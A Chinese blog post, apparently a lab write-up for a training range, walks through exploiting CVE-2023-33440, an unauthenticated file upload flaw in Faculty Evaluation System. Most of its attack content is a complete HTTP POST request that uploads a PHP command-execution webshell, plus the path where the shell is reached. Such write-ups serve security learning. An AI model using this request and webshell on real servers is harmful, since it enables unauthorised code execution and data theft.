CVE-2023-33440~文件上传【春秋云境靶场渗透】

已于 2024-08-07 21:39:30 修改
阅读量670 收藏
点赞数 16
分类专栏: 春秋云境靶场 文章标签: 网络安全 apache
于 2024-08-04 18:51:20 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_67832625/article/details/140909947
版权

在这里插入图片描述

# 今天我们来攻破CVE-2023-33440任意文件上传漏洞

image-20240804162626938

# 发现页面什么也没有,那我们只能拿工具开始扫描

image-20240804163343876

# 使用御剑来给他进行目录扫描

image-20240804163512140

# 发现http://eci-2zehtkn8du2v7ycdpatr.cloudeci1.ichunqiu.com/login.php这个有登录页面

image-20240804163614072

# 看到介绍说是未受权上传,大概应该是不用登录就能有漏洞,那么我们直接用burp抓包
# 然后我们搞一个poc
POST /ajax.php?action=update_user HTTP/1.1
Host: XXX
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Referer: http://XXX/index.php?page=report
Content-Length: 750
Content-Type: multipart/form-data; boundary=---------------------------166782539326470
Connection: close
 
-----------------------------166782539326470
Content-Disposition: form-data; name="id"
 
1
-----------------------------166782539326470
Content-Disposition: form-data; name="firstname"
 
Administrator
-----------------------------166782539326470
Content-Disposition: form-data; name="lastname"
 
a
-----------------------------166782539326470
Content-Disposition: form-data; name="email"
 
admin@admin.com
-----------------------------166782539326470
Content-Disposition: form-data; name="password"
 
admin
-----------------------------166782539326470
Content-Disposition: form-data; name="img"; filename="php.php"
Content-Type: application/octet-stream
 
<?php system("cat /flag");?>
-----------------------------166782539326470--

需要注意poc里面的域名得换成我们自己的,如下图 第二张图需要把前面所有的空格删掉,不然不会回显

image-20240804184622923

image-20240804184348425

最后发现回现

# 我们直接访问
http://eci-2ze9r318c46fnkdif4ei.cloudeci1.ichunqiu.com/assets/uploads/1722767940_php.php

image-20240804184725691

好小子,离成功又近一步!!!

蚂蚱.top
关注
专栏目录
【中危】Spring Kafka 反序列化漏洞 (CVE-2023-34040)
OSCS开源安全社区
08-25 886
墨知是国内首个专注软件供应链安全领域的技术社区,社区致力于为国内数百万技术人员提供全方位的软件供应链安全专业知识内容,包括软件供应链安全技术、漏洞情报、开源组件安全、SBOM、软件成分分析(SCA)、开源许可证合规等前沿技术及最佳实践。墨知通过促进知识共享、技术研究和合作交流,帮助组织和个人提高软件供应链的安全性,减少供应链攻击的风险,并保护软件生态系统的整体安全。
CVE-2023-33440(任意文件上传
热门推荐
Battery的博客
07-20 2万+
Faculty Evaluation System v1.0 存在未授权任意文件上传漏洞漏洞。
CVE-2023-33440详解
a666666688的博客
08-05 505
【代码】CVE-2023-33440
春秋云境 | 文件上传 | CVE-2023-33440
weixin_68416970的博客
08-07 186
Faculty Evaluation System v1.0 存在未授权任意文件上传漏洞漏洞。
春秋云镜】Faculty Evaluation System未授权任意文件上传漏洞(CVE-2023-33440)
shelbytt的博客
06-12 712
登录邮箱不知道 一般是 admin@admin.com/admin 尝试无果,根据提示是未授权访问文件上传 ,应该不需要登录就能触发漏洞的,看了些漏洞介绍,直接burp suite抓包。因为该靶场没有Write up,索性自己搞一下,方便别人,快乐自己!随便点都没啥东西,索性拿工具扫描下敏感路径。访问shell 地址,拿到flag。只修改IP即可,发包即可上传成功。
WuThreat身份安全云-TVD每日漏洞情报-2023-05-30
wuthreat无胁科技的博客
05-31 856
相关涉及:应用-faculty_evaluation_system_project-faculty_evaluation_system-1.0---相关涉及:系统-fedora_EPEL_8-pdns-recursor-*-Up to-(excluding)-4.8.4-1.el8-TVD_ID=TVD-2023-11764。漏洞编号:CVE-2023-2643,CNVD-2023-41540,CNNVD-202305-1009。漏洞编号:CVE-2023-33355,CNNVD-202305-2217。
CVE-2023-38836~文件上传漏洞【春秋云境靶场渗透
weixin_67832625的博客
07-31 308
春秋云境模拟真实靶场环境,本题运用了文件上传的漏洞,对环境进行渗透,详细介绍了解题思路。
CVE-2023-6548 和 CVE-2023-65的Citrix Netscaler/ADC-13.0-92.21 最新补丁
01-19
针对CVE-2023-6548 和 CVE-2023-6549 的 NetScaler ADC 和 NetScaler Gateway 的漏洞补丁升级包 CVE-2023-6548 :在管理接口上执行经过身份验证的(低特权)远程代码 CVE-2023-6549:拒绝服务 2、 强烈建议受影响...
OpenSSH(CVE-2023-38408)一键升级修复-OpenSSH9.5p1
10-17
2023年,OpenSSH发现了一个名为CVE-2023-38408的安全漏洞,这个漏洞可能允许攻击者在特定条件下绕过身份验证或执行未授权的操作,对系统安全构成威胁。为了保护您的系统不受此漏洞影响,及时升级到OpenSSH 9.5p1...
春秋云境 CVE-2022-4230 夺旗
05-02
### 春秋云境 CVE-2022-4230 夺旗知识点解析 #### 一、漏洞概述 **CVE-2022-4230** 是一个存在于 **WP Statistics** WordPress 插件(版本13.2.9及以前)中的安全漏洞。该漏洞的主要原因是插件在处理特定参数时...
CVE-2023-21768 Windows AFD 本地提权漏洞 C 源码
08-23
CVE-2023-21768 Windows Ancillary Function Driver (AFD) afd.sys本地提权漏洞。 AFD (Ancillary Function Driver)是Windows操作系统中的一个内核模式驱动程序。 漏洞原理: 该漏洞存在于AFD驱动程序处理用户...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8551
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
Apache Doris:高级数据导入导出与外部系统集成
Programming Talk
11-15 653
本文将进一步探讨 Doris 的高级数据导入导出功能、数据安全与权限管理,以及如何与外部系统集成。通过本文,读者将能够更全面地了解 Doris 的高级功能,从而更好地管理和使用数据。通过本文,读者将能够更全面地了解 Doris 的高级功能,从而更好地管理和使用数据。Doris 也支持与 Flink 的集成,可以使用 Flink SQL 对 Doris 中的数据进行实时处理和分析。Doris 提供了与 Spark 的集成,可以使用 Spark SQL 对 Doris 中的数据进行查询和分析。
kali上安装docker,并且生成centos7容器和创建apache容器后台运行
2202_75361164的博客
11-15 544
首先更新一下软件包列表下载docker验证是否安装成功docker -v。
Apache Spark & Paimon Meetup · 北京站,助力 LakeHouse 架构生产落地
科技很有意思
11-12 668
阿里云 EMR 技术团队联合 Apache Paimon 社区,联合举办“ Apache Spark & Paimon, 助力 LakeHouse 架构生产落地”线下 meetup,分享 LakeHouse 架构的核心技术和最佳实践经验,为大数据从业者提供一个开放的分享与交流平台。
Docker 安装 Apache
wjs2024的博客
11-12 992
Docker 是一个开源的应用容器引擎,它允许开发者打包他们的应用以及应用的依赖包到一个可移植的容器中,然后发布到任何流行的 Linux 机器上,也可以实现虚拟化。容器是完全使用沙箱机制,相互之间不会有任何接口。Apache HTTP Server 是一个开源的网页服务器,可以在大多数计算机操作系统上运行,由于其跨平台和安全性高的特点,被广泛使用。它支持多种模块,可以通过加载不同的模块来支持多种功能,如 SSL 加密、URL 重写等。在宿主机上创建一个 Apache 配置文件,例如。在运行容器时,使用。
新版Apache Tomcat ⽬目录文件讲解(笔记)
最新发布
weixin_67996964的博客
11-15 319
catalina.out 运⾏行行⽇日志⽂文件,即标准输出和标准出错,也包含tomcat运⾏行行⾃自⼰己输出的⽇日志以及应⽤用里向console输出的⽇日志。其中ROOT是⼀一个特殊的项⽬目,在地址栏中没有给出项⽬目⽬目录时,对应的就是ROOT项⽬目。运⾏行行的相关⽇日志⽂文件,Tomcat启动和关闭的信息,如果启动Tomcat时有错误。Tomcat的主要Web发布⽬目录,存放web项⽬目,其中每个⽂文件夹都是⼀一个项⽬目。如果需要添加Tomcat都依赖的jar⽂文件,可以把它放到这个⽬目录。
什是服务器器和Apache Tomcat介绍(笔记)
weixin_67996964的博客
11-15 213
⼀一个开源软件项⽬目的Apache 的团体提供⽀支持的⾮非盈利利性组织,也是我们java开发里⾯面顶级的组织,阿⾥里里也向apache组织贡献了了多个开源项⽬目。简单来说:是⼀一个开放源代码的轻量量级 Web应⽤用服务器器,⽬目前javaweb开发⾥里里⾯面⽤用的最多⼀个web服务器器之⼀一。Apache是web服务器器,Tomcat是应⽤用(java)服务器器,它是⼀一个servlet容器器,是。简介:讲解什什么是服务器器和Tomcat介绍。
CVE-2023-33440
06-19
CVE-2023-33440是一个安全漏洞的编号,它通常代表某个软件或系统中的安全漏洞。这些漏洞是由CERT(Common Vulnerabilities and Exposures)项目分配的,用来统一标识全球范围内的信息安全漏洞。然而,由于漏洞的详细信息是实时更新的,没有特定的上下文,我无法提供关于CVE-2023-33440的具体细节,比如它影响的软件、严重程度或修复方法。 如果你想知道这个漏洞的详细情况,我建议你查阅最新的安全公告、厂商发布的补丁说明或者访问权威的安全信息源,如CERT、CVE官方网站,或者是第三方安全通报网站。这样可以获得最准确和及时的信息。
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值